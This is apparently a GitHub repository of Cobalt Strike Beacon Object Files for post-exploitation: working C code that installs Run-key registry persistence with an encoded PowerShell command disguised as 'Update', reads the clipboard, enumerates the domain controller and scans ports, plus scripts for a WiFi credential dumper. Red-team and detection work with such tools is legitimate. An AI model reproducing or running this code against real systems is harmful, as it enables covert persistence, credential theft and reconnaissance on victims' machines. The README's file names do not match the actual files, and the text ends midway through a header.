├── .gitattributes ├── Persistence ├── Makefile ├── RegistryPersistence.c └── beacon.h ├── Active_Directory ├── Makefile ├── GetDomainInfo.c └── beacon.h ├── Collection ├── WiFi │ ├── Makefile │ ├── wifidump.cna │ ├── beacon.h │ └── wifidump.c └── Clipboard │ ├── Makefile │ ├── GetClipboard.c │ └── beacon.h ├── Network └── PortScan │ ├── Makefile │ ├── portscan.cna │ ├── beacon.h │ └── PortScan.c ├── .gitignore ├── README.md └── LICENSE /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Persistence/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | all: $(OBJS) 7 | 8 | %.o: %.c 9 | $(CC_x64) $(CFLAGS) -o $@ -c $< 10 | $(STRIP_x64) --strip-unneeded $@ 11 | 12 | clean: 13 | rm *.o -------------------------------------------------------------------------------- /Active_Directory/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | all: $(OBJS) 7 | 8 | %.o: %.c 9 | $(CC_x64) $(CFLAGS) -o $@ -c $< 10 | $(STRIP_x64) --strip-unneeded $@ 11 | 12 | clean: 13 | rm *.o -------------------------------------------------------------------------------- /Collection/WiFi/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | all: $(OBJS) 7 | 8 | %.o: %.c 9 | $(CC_x64) $(CFLAGS) -o $@ -c $< 10 | $(STRIP_x64) --strip-unneeded $@ 11 | 12 | clean: 13 | rm *.o -------------------------------------------------------------------------------- /Network/PortScan/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | all: $(OBJS) 7 | 8 | %.o: %.c 9 | $(CC_x64) $(CFLAGS) -o $@ -c $< 10 | $(STRIP_x64) --strip-unneeded $@ 11 | 12 | clean: 13 | rm *.o -------------------------------------------------------------------------------- /Collection/Clipboard/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | all: $(OBJS) 7 | 8 | %.o: %.c 9 | $(CC_x64) $(CFLAGS) -o $@ -c $< 10 | $(STRIP_x64) --strip-unneeded $@ 11 | 12 | clean: 13 | rm *.o -------------------------------------------------------------------------------- /Network/PortScan/portscan.cna: -------------------------------------------------------------------------------- 1 | alias bofportscan { 2 | local('$handle $args'); 3 | 4 | 5 | # read in the right BOF file 6 | $handle = openf(script_resource("PortScan.o")); 7 | $data = readb($handle, -1); 8 | closef($handle); 9 | 10 | # pack our arguments 11 | $args = bof_pack($1, "zz", $2, $3); 12 | 13 | # announce what we're doing 14 | btask($1, "Running PortScan BOF"); 15 | 16 | # execute it. 17 | beacon_inline_execute($1, $data, "go", $args); 18 | } -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /Collection/Clipboard/GetClipboard.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "beacon.h" 5 | 6 | DECLSPEC_IMPORT HWND WINAPI KERNEL32$GetConsoleWindow(void); 7 | DECLSPEC_IMPORT WINUSERAPI BOOL WINAPI USER32$OpenClipboard(HWND); 8 | DECLSPEC_IMPORT WINUSERAPI HANDLE WINAPI USER32$GetClipboardData(UINT); 9 | DECLSPEC_IMPORT WINUSERAPI BOOL WINAPI USER32$CloseClipboard(void); 10 | 11 | 12 | void go() { 13 | 14 | HWND owner = KERNEL32$GetConsoleWindow(); 15 | USER32$OpenClipboard(owner); 16 | owner = USER32$GetClipboardData(CF_TEXT); 17 | BeaconPrintf(CALLBACK_OUTPUT, "%s\n", (char *)owner);; 18 | USER32$CloseClipboard(); 19 | } -------------------------------------------------------------------------------- /Collection/WiFi/wifidump.cna: -------------------------------------------------------------------------------- 1 | alias wifidump { 2 | local('$handle $data $args'); 3 | 4 | 5 | # read in the right BOF file 6 | $handle = openf(script_resource("wifidump.o")); 7 | $data = readb($handle, -1); 8 | closef($handle); 9 | 10 | # pack our arguments 11 | $args = bof_pack($1, "Z", $2); 12 | 13 | # announce what we're doing 14 | btask($1, "Running wifidump BOF"); 15 | 16 | # execute it. 17 | beacon_inline_execute($1, $data, "wifidump", $args); 18 | } 19 | 20 | alias wifienum { 21 | local('$handle $data $args'); 22 | 23 | 24 | # read in the right BOF file 25 | $handle = openf(script_resource("wifidump.o")); 26 | $data = readb($handle, -1); 27 | closef($handle); 28 | 29 | # pack our arguments 30 | $args = bof_pack($1, "Z", $2); 31 | 32 | # announce what we're doing 33 | btask($1, "Running wifidump BOF"); 34 | 35 | # execute it. 36 | beacon_inline_execute($1, $data, "wifienum", $args); 37 | } -------------------------------------------------------------------------------- /Active_Directory/GetDomainInfo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "beacon.h" 5 | 6 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 7 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); 8 | // https://www.cobaltstrike.com/help-beacon-object-files 9 | void go(char * args, int alen) { 10 | DWORD dwRet; 11 | PDOMAIN_CONTROLLER_INFO pdcInfo; 12 | 13 | dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo); 14 | if (ERROR_SUCCESS == dwRet) { 15 | BeaconPrintf(CALLBACK_OUTPUT, "Domain Forest Name: %s\n" 16 | "Domain: %s\n" 17 | "Domain Controller: %s\n" 18 | "Domain Controller Address: %s\n" 19 | "DC Site Name: %s\n", 20 | pdcInfo->DnsForestName, 21 | pdcInfo->DomainName, 22 | pdcInfo->DomainControllerName, 23 | pdcInfo->DomainControllerAddress, 24 | pdcInfo->DcSiteName); 25 | } 26 | 27 | NETAPI32$NetApiBufferFree(pdcInfo); 28 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BOF_Collection 2 | Various Cobalt Strike BOFs 3 | 4 | ## Requirements 5 | [beacon.h](https://www.cobaltstrike.com/downloads/beacon.h) 6 | 7 | For compilation instructions and BOF overview [help-bof](https://www.cobaltstrike.com/help-beacon-object-files) 8 | 9 | ## Active_Directory 10 | 11 | ### GetDomainInfo.c 12 | 13 | Returns information on the current domain and domain controller. 14 | 15 | `inline-execute GetDomainInfo.o` 16 | 17 | ## Collection 18 | 19 | ### GetClipboard.c 20 | 21 | Prints any text on the clipboard. 22 | 23 | `inline-execute GetClipboard.o` 24 | 25 | ### dumpwifi.c 26 | 27 | Enumerates WiFi interfaces and dumps clear text credentials 28 | 29 | load dumpwifi.cna 30 | 31 | `enumwifi` 32 | 33 | `dumpwifi Wifi_Profile_Name` 34 | 35 | ## Network 36 | 37 | ### PortScan.c 38 | 39 | Scans a single port on a remote host. 40 | 41 | load portscan.cna 42 | 43 | `bofportscan 192.168.1.10 3389` 44 | 45 | ## Persistence 46 | 47 | ### RegistryPersistence.c 48 | 49 | Installs or removes registry persistence. 50 | 51 | `inline-execute RegistryPersistence.o Install` 52 | 53 | `inline-execute RegistryPersistence.o Remove` 54 | 55 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Steve Borosh 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /Persistence/RegistryPersistence.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "beacon.h" 5 | 6 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 7 | DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExW(HKEY, LPCWSTR, DWORD, REGSAM, PHKEY); 8 | DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegSetValueExW(HKEY, LPCWSTR, DWORD, DWORD, BYTE*, DWORD); 9 | DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY); 10 | DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyValueW (HKEY, LPCWSTR, LPCWSTR); 11 | 12 | void InstallPersistence() { 13 | HKEY key; 14 | WCHAR payload[] = L"powershell -enc AAAAAAAA=="; 15 | 16 | 17 | 18 | if (ADVAPI32$RegOpenKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &key) == ERROR_SUCCESS) 19 | { 20 | BeaconPrintf(CALLBACK_OUTPUT,"Key opened \n"); 21 | if (ADVAPI32$RegSetValueExW(key, L"Update", 0, REG_SZ, (LPBYTE)payload, sizeof(payload)) == ERROR_SUCCESS) 22 | { 23 | BeaconPrintf(CALLBACK_OUTPUT,"Key changed in registry, persistence installed \n"); 24 | 25 | 26 | } 27 | else{ 28 | BeaconPrintf(CALLBACK_OUTPUT,"Key not changed in registry \n"); 29 | 30 | } 31 | ADVAPI32$RegCloseKey(key); 32 | } 33 | else 34 | { 35 | BeaconPrintf(CALLBACK_OUTPUT,"Failed to open key \n"); 36 | BeaconPrintf(CALLBACK_OUTPUT,"Cannot find key value in registry \n"); 37 | 38 | } 39 | 40 | } 41 | 42 | void RemovePersistence() { 43 | HKEY key; 44 | WCHAR keyname[] = L"Update"; 45 | WCHAR payload[] = L"powershell -enc JDJDJDJDJ=="; 46 | 47 | 48 | if (ADVAPI32$RegOpenKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &key) == ERROR_SUCCESS) 49 | { 50 | BeaconPrintf(CALLBACK_OUTPUT,"Key location open successful \n"); 51 | if (ADVAPI32$RegDeleteKeyValueW(key, L"Run", keyname) == ERROR_SUCCESS) 52 | { 53 | BeaconPrintf(CALLBACK_OUTPUT,"Key deleted in registry, persistence removed. \n"); 54 | } 55 | else{ 56 | BeaconPrintf(CALLBACK_OUTPUT,"Key not deleted in registry \n"); 57 | 58 | } 59 | ADVAPI32$RegCloseKey(key); 60 | } 61 | else 62 | { 63 | BeaconPrintf(CALLBACK_OUTPUT,"Unsuccessful in opening key \n"); 64 | BeaconPrintf(CALLBACK_OUTPUT,"Cannot find key value in registry \n"); 65 | } 66 | } 67 | 68 | void go(char * args, int alen) { 69 | int remove; 70 | int install; 71 | remove = MSVCRT$strcmp(args, "Remove") == 0; 72 | install = MSVCRT$strcmp(args, "Install") == 0; 73 | if(remove > 0) { 74 | RemovePersistence(); 75 | }else if(install > 0){ 76 | InstallPersistence(); 77 | } else { 78 | BeaconPrintf(CALLBACK_OUTPUT, "Please use either an Install or Remove argument."); 79 | } 80 | 81 | } -------------------------------------------------------------------------------- /Persistence/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | */ 14 | 15 | /* data API */ 16 | typedef struct { 17 | char * original; /* the original buffer [so we can free it] */ 18 | char * buffer; /* current pointer into our buffer */ 19 | int length; /* remaining length of data */ 20 | int size; /* total size of this buffer */ 21 | } datap; 22 | 23 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 24 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 25 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 26 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 27 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 28 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 29 | 30 | /* format API */ 31 | typedef struct { 32 | char * original; /* the original buffer [so we can free it] */ 33 | char * buffer; /* current pointer into our buffer */ 34 | int length; /* remaining length of data */ 35 | int size; /* total size of this buffer */ 36 | } formatp; 37 | 38 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 39 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 40 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 41 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 42 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 43 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 44 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 45 | 46 | /* Output Functions */ 47 | #define CALLBACK_OUTPUT 0x0 48 | #define CALLBACK_OUTPUT_OEM 0x1e 49 | #define CALLBACK_OUTPUT_UTF8 0x20 50 | #define CALLBACK_ERROR 0x0d 51 | 52 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 53 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 54 | 55 | 56 | /* Token Functions */ 57 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 58 | DECLSPEC_IMPORT void BeaconRevertToken(); 59 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 60 | 61 | /* Spawn+Inject Functions */ 62 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 63 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 65 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 66 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 67 | 68 | /* Utility Functions */ 69 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 70 | -------------------------------------------------------------------------------- /Active_Directory/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | */ 14 | 15 | /* data API */ 16 | typedef struct { 17 | char * original; /* the original buffer [so we can free it] */ 18 | char * buffer; /* current pointer into our buffer */ 19 | int length; /* remaining length of data */ 20 | int size; /* total size of this buffer */ 21 | } datap; 22 | 23 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 24 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 25 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 26 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 27 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 28 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 29 | 30 | /* format API */ 31 | typedef struct { 32 | char * original; /* the original buffer [so we can free it] */ 33 | char * buffer; /* current pointer into our buffer */ 34 | int length; /* remaining length of data */ 35 | int size; /* total size of this buffer */ 36 | } formatp; 37 | 38 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 39 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 40 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 41 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 42 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 43 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 44 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 45 | 46 | /* Output Functions */ 47 | #define CALLBACK_OUTPUT 0x0 48 | #define CALLBACK_OUTPUT_OEM 0x1e 49 | #define CALLBACK_OUTPUT_UTF8 0x20 50 | #define CALLBACK_ERROR 0x0d 51 | 52 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 53 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 54 | 55 | 56 | /* Token Functions */ 57 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 58 | DECLSPEC_IMPORT void BeaconRevertToken(); 59 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 60 | 61 | /* Spawn+Inject Functions */ 62 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 63 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 65 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 66 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 67 | 68 | /* Utility Functions */ 69 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 70 | -------------------------------------------------------------------------------- /Collection/WiFi/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | */ 14 | 15 | /* data API */ 16 | typedef struct { 17 | char * original; /* the original buffer [so we can free it] */ 18 | char * buffer; /* current pointer into our buffer */ 19 | int length; /* remaining length of data */ 20 | int size; /* total size of this buffer */ 21 | } datap; 22 | 23 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 24 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 25 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 26 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 27 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 28 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 29 | 30 | /* format API */ 31 | typedef struct { 32 | char * original; /* the original buffer [so we can free it] */ 33 | char * buffer; /* current pointer into our buffer */ 34 | int length; /* remaining length of data */ 35 | int size; /* total size of this buffer */ 36 | } formatp; 37 | 38 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 39 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 40 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 41 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 42 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 43 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 44 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 45 | 46 | /* Output Functions */ 47 | #define CALLBACK_OUTPUT 0x0 48 | #define CALLBACK_OUTPUT_OEM 0x1e 49 | #define CALLBACK_OUTPUT_UTF8 0x20 50 | #define CALLBACK_ERROR 0x0d 51 | 52 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 53 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 54 | 55 | 56 | /* Token Functions */ 57 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 58 | DECLSPEC_IMPORT void BeaconRevertToken(); 59 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 60 | 61 | /* Spawn+Inject Functions */ 62 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 63 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 65 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 66 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 67 | 68 | /* Utility Functions */ 69 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 70 | -------------------------------------------------------------------------------- /Network/PortScan/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | */ 14 | 15 | /* data API */ 16 | typedef struct { 17 | char * original; /* the original buffer [so we can free it] */ 18 | char * buffer; /* current pointer into our buffer */ 19 | int length; /* remaining length of data */ 20 | int size; /* total size of this buffer */ 21 | } datap; 22 | 23 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 24 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 25 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 26 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 27 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 28 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 29 | 30 | /* format API */ 31 | typedef struct { 32 | char * original; /* the original buffer [so we can free it] */ 33 | char * buffer; /* current pointer into our buffer */ 34 | int length; /* remaining length of data */ 35 | int size; /* total size of this buffer */ 36 | } formatp; 37 | 38 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 39 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 40 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 41 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 42 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 43 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 44 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 45 | 46 | /* Output Functions */ 47 | #define CALLBACK_OUTPUT 0x0 48 | #define CALLBACK_OUTPUT_OEM 0x1e 49 | #define CALLBACK_OUTPUT_UTF8 0x20 50 | #define CALLBACK_ERROR 0x0d 51 | 52 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 53 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 54 | 55 | 56 | /* Token Functions */ 57 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 58 | DECLSPEC_IMPORT void BeaconRevertToken(); 59 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 60 | 61 | /* Spawn+Inject Functions */ 62 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 63 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 65 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 66 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 67 | 68 | /* Utility Functions */ 69 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 70 | -------------------------------------------------------------------------------- /Collection/Clipboard/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | */ 14 | 15 | /* data API */ 16 | typedef struct { 17 | char * original; /* the original buffer [so we can free it] */ 18 | char * buffer; /* current pointer into our buffer */ 19 | int length; /* remaining length of data */ 20 | int size; /* total size of this buffer */ 21 | } datap; 22 | 23 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 24 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 25 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 26 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 27 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 28 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 29 | 30 | /* format API */ 31 | typedef struct { 32 | char * original; /* the original buffer [so we can free it] */ 33 | char * buffer; /* current pointer into our buffer */ 34 | int length; /* remaining length of data */ 35 | int size; /* total size of this buffer */ 36 | } formatp; 37 | 38 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 39 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 40 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 41 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 42 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 43 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 44 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 45 | 46 | /* Output Functions */ 47 | #define CALLBACK_OUTPUT 0x0 48 | #define CALLBACK_OUTPUT_OEM 0x1e 49 | #define CALLBACK_OUTPUT_UTF8 0x20 50 | #define CALLBACK_ERROR 0x0d 51 | 52 | DECLSPEC_IMPORT void 